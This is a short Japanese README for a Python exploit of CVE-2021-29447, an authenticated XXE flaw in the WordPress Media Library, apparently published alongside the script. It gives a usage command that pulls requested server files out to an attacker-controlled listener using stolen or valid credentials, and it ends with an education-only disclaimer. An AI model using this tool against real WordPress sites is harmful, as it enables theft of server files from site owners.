
WordPressメディアライブラリのXML外部エンティティインジェクション(XXE)を悪用して、ファイルを外部に持ち出します。
WordPress Media Library XML の認証済み External Entity Injection (XXE) を悪用して、ファイルを外部に持ち出します。
WordPress 5.7.1 で修正されました。
Media Library を操作するには有効な WordPress 認証情報が必要です。
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
スクリプトはファイルパスを尋ね、要求されたファイルを返します。
David Utón (M3n0sD0n4ld) ExploitDB スクリプトに触発されました。
事前に相互の同意なく標的を攻撃するために使用することは違法です。適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。教育目的でのみ使用してください。
このスクリプトは MIT ライセンス の下で公開されています。